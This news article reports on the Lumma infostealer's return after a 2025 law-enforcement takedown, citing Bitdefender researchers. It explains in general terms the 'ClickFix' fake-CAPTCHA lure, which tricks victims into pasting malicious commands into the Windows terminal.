In May, law enforcement agencies worldwide claimed a significant win after disrupting the infrastructure behind Lumma, an infostealer that had compromised almost 395,000 Windows machines in the two months leading up to the coordinated action. On Wednesday, researchers reported that Lumma has resurfaced “at scale” in hard-to-detect campaigns that harvest credentials and sensitive documents.
Lumma, often called Lumma Stealer, first surfaced on Russian-language cybercrime forums in 2022. Its cloud-hosted malware-as-a-service setup supplied an extensive network of domains used for lure sites offering cracked apps, games, and pirated films, along with command-and-control channels and the other components threat actors need to operate an infostealing service. Within a year, premium versions were advertised for up to $2,500. By spring 2024, the FBI found more than 21,000 forum listings. Microsoft later described Lumma as the “go-to tool” for several criminal groups, including the prolific Scattered Spider.
Takedowns are hard
The FBI and an international coalition of its counterparts took action early last year. In May they reported seizing some 2,300 domains, command-and-control nodes, and marketplaces that had supported the infostealer. Despite that effort, the malware has since reemerged and is infecting a notable number of systems again.
“LummaStealer is back at scale, despite a major 2025 law-enforcement takedown that disrupted thousands of its command-and-control domains,” researchers from security firm Bitdefender wrote. “The operation has rapidly rebuilt its infrastructure and continues to spread worldwide.”
As before, the recent uptick relies heavily on a social-engineering trick dubbed “ClickFix,” which has proven alarmingly effective at getting users to infect their own machines. These lures typically masquerade as fake CAPTCHAs that — rather than asking users to tick a box or identify elements in a scrambled image — prompt them to copy a piece of text and paste it into an input field, a step that takes only seconds. The pasted text contains malicious commands posed as the CAPTCHA, and the input field is the Windows terminal. Victims who follow the instructions install a loader, which then deploys Lumma.
